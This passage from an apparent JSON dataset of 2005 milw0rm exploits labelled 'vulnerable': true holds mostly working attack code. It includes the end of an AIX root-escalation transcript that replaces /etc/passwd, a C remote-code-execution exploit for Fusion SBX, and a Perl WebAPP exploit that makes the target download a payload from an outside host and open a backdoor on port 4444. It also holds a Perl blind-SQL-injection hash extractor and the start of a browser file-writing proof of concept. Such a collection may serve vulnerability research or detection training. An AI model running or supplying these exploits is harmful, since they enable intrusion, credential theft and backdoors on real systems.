/etc/passwd\n\nroot:!:0:0::/:/usr/bin/ksh\n\ndaemon:!:1:1::/etc:\n\nbin:!:2:2::/bin:\n\nsys:!:3:3::/usr/sys:\n\nadm:!:4:4::/var/adm:\n\nuucp:!:5:5::/usr/lib/uucp:\n\nguest:!:100:100::/home/guest:\n\nnobody:!:4294967294:4294967294::/:\n\nlpd:!:9:4294967294::/:\n\nlp:*:11:11::/var/spool/lp:/bin/false\n\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n\nnuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n\nsnapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd\n\nimnadm:*:188:188::/home/imnadm:/usr/bin/ksh\n\ncloud:!:0:1::/home/cloud:/usr/local/bin/bash\n\ntest:!:201:1::/home/cloud:/usr/local/bin/bash\n\n\n\n\n\n-bash-2.05b$ su cloud\n\ncloud's Password:\n\nbash-2.05b# id\n\nuid=0(root) gid=1(staff)\n\nbash-2.05b# ls -l /etc/passwd\n\n-rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd\n\nbash-2.05b# cp /tmp/passwd /etc/passwd\n\nbash-2.05b# chown root /tmp/passwd\n\nbash-2.05b# ls -l /tmp/passwd\n\n-rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd\n\nbash-2.05b# id\n\nuid=0(root) gid=1(staff)\n\nbash-2.05b#\n\nbash-2.05b# rm /tmp/.bel*\n\nbash-2.05b# rm /tmp/passwd\n\nbash-2.05b#\n\n\n\n\n\n# milw0rm.com [2005-05-19]", + "vulnerable": true + }, + { + "exploit_id": 1003, + "content": "/*****************************************************\n\n* *\n\n* [Fusion SBX <= 1.2] exploit *\n\n* *\n\n* sileFSBXxpl *\n\n* *\n\n* This exploit use vulnerability found into *\n\n* Fusion SBX and create new variable and call it *\n\n* with a malicious function (stored in config.php). *\n\n* This exploit utilize injection of three diverse *\n\n* procedures for execution of arbitrary code on *\n\n* vulnerable machine with httpd privileges. *\n\n* *\n\n* References: www.securityfocus.org/bid/13575 * \n\n* *\n\n* coded by: Silentium of Anacron Group Italy *\n\n* date: 10/05/2005 *\n\n* e-mail: anacrongroupitaly[at]autistici[dot]org *\n\n* my_home: www.autistici.org/anacron-group-italy *\n\n* *\n\n* this tool is developed under GPL license *\n\n* no(c) .:. copyleft *\n\n* *\n\n*****************************************************/\n\n\n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n\n\n#define PORT 80\t\t// port of web server \n\n\n\nvoid info(void);\n\nvoid banner(void);\n\nvoid sendxpl(FILE *out, char *argv[], int type);\n\nvoid errsock(void);\n\nvoid errgeth(void);\n\nvoid errconn(char *argv[]);\n\n\n\n\n\nint main(int argc, char *argv[]){\n\n\n\nFILE *out;\n\nint sock, sockconn, type;\n\nstruct sockaddr_in addr;\n\nstruct hostent *hp;\n\n\n\nif(argc!=4)\n\n info();\n\n\n\ntype = atoi(argv[3]);\n\n\n\nif(type < 1 || type > 3)\n\n info();\n\n\n\nbanner();\n\n \n\nif((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)\n\n errsock();\n\n \n\n printf(\"[*] Creating socket\t\t[OK]\\n\");\n\n\n\nif((hp = gethostbyname(argv[1])) == NULL)\n\n errgeth();\n\n \n\n printf(\"[*] Resolving victim host\t[OK]\\n\");\n\n \n\nmemset(&addr,0,sizeof(addr));\n\nmemcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);\n\naddr.sin_family = AF_INET;\n\naddr.sin_port = htons(PORT);\n\n \n\nsockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));\n\nif(sockconn < 0)\n\n errconn(argv);\n\n \n\n printf(\"[*] Connecting at victim host [OK]\\n\");\n\n \n\nout = fdopen(sock,\"a\");\n\nsetbuf(out,NULL);\n\n\n\nsendxpl(out,argv,type);\n\n\n\n printf(\"[*] Now test at execute code on\\n\\n\" \n\n \"[1] %s%sindex.php?sile=id\\n\"\n\n \"[2] %s%sadmin/index.php?sile=id\\n\\n\",argv[1],argv[2],argv[1],argv[2]);\n\n\n\nshutdown(sock,2);\n\nclose(sock);\n\n\n\nreturn 0;\n\n\n\n}\n\n\n\n\n\nvoid info(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"\\n #########################################\\n\"\n\n \" # sileFSBXxpl #\\n\"\n\n \" # ################################### #\\n\"\n\n \" # Fusion SBX <= 1.2 exploit #\\n\"\n\n \" # Remote Command Execution #\\n\"\n\n \" # coded by Silentium #\\n\" \n\n \" # [ Anacron Group Italy ] #\\n\"\n\n \" # ################################### #\\n\"\n\n \" # www.autistici.org/anacron-group-italy #\\n\"\n\n \" #########################################\\n\\n\"\n\n \" [Usage]\\n\\n\" \n\n \" sileFSBXxpl \\n\\n\"\n\n \" [Type]\\n\\n\"\n\n \" 1) injection of system()\\n\"\n\n \" 2) injection of exec()\\n\"\n\n \" 3) injection of passthru()\\n\\n\"\n\n \" [Example]\\n\\n\"\n\n \" sileFSBXxpl www.victim.com /sbx/ 1\\n\\n\"); \n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid banner(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"[-] sileFSBXxpl\\n\"\n\n \" ============\\n\"\n\n \"[-] Fusion SBX <= 1.2 exploit\\n\"\n\n \"[-] coded by Silentium - Anacron Group Italy\\n\"\n\n \"[-] www.autistici.org/anacron-group-italy\\n\\n\");\n\n \n\n}\n\n \n\n\n\nvoid sendxpl(FILE *out, char *argv[], int type){\n\n\n\nchar *call;\n\nint size = 245;\n\n\n\nif(type == 1)\n\n call = \"system\";\n\nelse if(type == 2)\n\n call = \"exec\";\n\nelse if(type == 3)\n\n call = \"passthru\";\n\n\n\nsize+=strlen(call);\n\n \n\nfprintf(out,\"POST %sadmin/?settings HTTP/1.0\\n\"\n\n \"Connection: Keep-Alive\\n\"\n\n \"Pragma: no-cache\\n\"\n\n \"Cache-control: no-cache\\n\"\n\n \"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\\n\"\n\n \"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\\n\"\n\n \"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\\n\"\n\n \"Accept-Language: en\\n\"\n\n \"Host: %s\\n\"\n\n \"Content-Type: application/x-www-form-urlencoded\\n\"\n\n \"Content-Length: %d\\n\\n\"\n\n \"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&\"\n\n \"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess\"\n\n \"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1\"\n\n \"&setsubmit=Commit+Changes&is_logged=1\\n\\n\",argv[2],argv[1],size,call);\n\n \n\n printf(\"[*] Sending exploit\t\t[OK]\\n\\n\");\n\n\n\n}\n\n \n\n \n\nvoid errsock(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"[x] Creating socket\t[FAILED]\\n\\n\");\n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid errgeth(void){\n\n\n\nprintf(\"[x] Resolving victim host\t[FAILED]\\n\\n\");\n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid errconn(char *argv[]){\n\n\n\nprintf(\"[x] Connecting at victim host\t[FAILED]\\n\\n\",argv[1]);\n\nexit(1);\n\n\n\n}\n\n\n\n// milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1004, + "content": " \n\n\n\n# milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1005, + "content": "!/usr/bin/perl\n\n#################################################################\n\n# T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m #\n\n#################################################################\n\n# Remote C0mmand Executing Expl0it - For WebAPP CGI\n\n#\n\n#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );\n\n#E-Mail : Alpha_Programmer@Yahoo.com\n\n# Trapset_Sec@Yahoo.Ca\n\n#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch\n\n#apage.cgi is Vulnerable in this M0ment !!\n\n#\n\n#################################################################\n\n# Gr33tz To ==> AlphaST.Com , Crouz.Com , Simorgh-ev.Com And MH_P0rtal , Oil_Krachack #\n\n#################################################################\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 2)\n\n{\n\n print \"\\n==============================================\\n\";\n\n print \" \\n WebAPP CGI Exploit By Alpha_Programmer \\n\\n\";\n\n print \" Trap-Set Underground Hacking Team \\n\\n\";\n\n print \" Usage: \\n\\n\";\n\n print \"==============================================\\n\\n\";\n\n print \"Examples:\\n\\n\";\n\n print \" WebApp.pl www.Host.com /cgi-bin/ \\n\";\n\n exit();\n\n}\n\n\n\n\n\n$serv = $ARGV[0];\n\n$serv =~ s/http:\\/\\///ge;\n\n\n\n$dir = $ARGV[1];\n\n\n\n$cmde = \"cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt\";\n\n\n\n$cmde =~ s/ /\"\\$IFS\"/ge;\n\n\n\n$req = \"GET http://$serv\";\n\n$req .= \"$dir\";\n\n$req .= \"apage.cgi?f=file.htm.|echo\\$IFS\\\"_N_\\\";$cmde;echo\\$IFS\\\"_T_\\\"| HTTP/1.0\\n\\n\";\n\n\n\n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\nprint $sock $req;\n\nprint \"\\nPlease Wait ...\\n\\n\";\n\nsleep(3000);\n\nclose($sock);\n\n\n\n$sock2 = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\n\n\n$cmde2 = \"cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl\";\n\n\n\n$cmde2 =~ s/ /\"\\$IFS\"/ge;\n\n\n\n$req2 = \"GET http://$serv\";\n\n$req2 .= \"$dir\";\n\n$req2 .= \"apage.cgi?f=file.htm.|echo\\$IFS\\\"_N_\\\";$cmde2;echo\\$IFS\\\"_T_\\\"| HTTP/1.0\\n\\n\";\n\n\n\nprint $sock2 $req2;\n\nprint \"\\n\\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\\n\";\n\nprint \"$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\\n\";\n\n\n\n### EOF ###\n\n\n\n\n\n# milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1006, + "content": "#!/usr/bin/perl\n\n\n\nuse strict;\n\nuse IO::Socket::INET;\n\n\n\n\n\n$| = print \"\n\nWoltlab Burning Board <= 2.3.1 Exploit\n\nVulnerability discovered by GulfTech Security Research\n\nVisit www.security-project.org\n\nExploit by deluxe89\n\n----------\n\n\";\n\n\n\n\n\n\n\nmy $host = 'www.security-project.org';\n\nmy $path = '/wbb2/'; # path to the board\n\nmy $userid = 1; # the password hash will be from the user with this id\n\nmy $username = 'deluxe89'; # any username from the board\n\nmy $proxy = ''; # proxy, you can leave this empty\n\nmy $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards\n\n\n\n\n\n# proxy handling\n\nmy ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);\n\nif($proxy ne '')\n\n{\n\n print \"[~] Using a proxy\\n\";\n\n}\n\nelse\n\n{\n\n print \"[~] You're using NO proxy!\\n\";\n\n sleep(1);\n\n}\n\n\n\n\n\n\n\n\n\n\n\n#\n\n# Get the hash\n\n#\n\n\n\nprint \"[~] Getting the hash. Please wait some minutes..\\n[+] Hash: \";\n\n\n\n\n\nmy $hash = '';\n\nfor(my $i=1;$i<33;$i++)\n\n{\n\n my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');\n\n\n\n if(&test($i, 96)) # buchstabe\n\n {\n\n for(my $c=97;$c<103;$c++)\n\n {\n\n if(&test($i, $c, 1))\n\n {\n\n print pack('c', $c);\n\n last;\n\n }\n\n }\n\n }\n\n else # zahl\n\n {\n\n #print \"0-4\\n\";\n\n for(my $c=48;$c<58;$c++)\n\n {\n\n if(&test($i, $c, 1))\n\n {\n\n print pack('c', $c);\n\n last;\n\n }\n\n }\n\n }\n\n}\n\nprint \"\\n\";\n\n\n\n\n\nsub test\n\n{\n\n my ($i, $num, $g) = @_;\n\n\n\n my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');\n\n my $value = \"sre4sdffr\\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))\";\n\n $value .= ($g) ? '=' : '>';\n\n $value .= \"$num)/*\";\n\n my $data = \"r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed\";\n\n\n\n print $sock \"POST http://$host${path}register.php HTTP/1.1\\r\\nHost: $host\\r\\nConnection: Close\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".length($data).\"\\r\\n\\r\\n$data\\r\\n\";\n\n\n\n\n\n while(<$sock>)\n\n {\n\n if($_ =~ m/$error/) { return 1; }\n\n }\n\n return 0;\n\n}\n\n\n\n# milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1007, + "content": "\n\n\n\nFirelinking 2 - Proof-of-Concept by mikx\n\n\n\n<-- This PoC is cross platform : On Windows this example creates the file -->\n\n<-- c:\\booom.bat and launches it (opens a dos box with a dir command). On -->\n\n<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->\n\n<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->\n\n<-- run twice in some cases (this will create an additional booom-1.txt). -->\n\n\n\n \n\n\n\n\n\n\n\n
\n\n\n\n
Firelinking 2 - Proof-of-Concept
\n\n

\n\n
\n\n
\n\n\n\n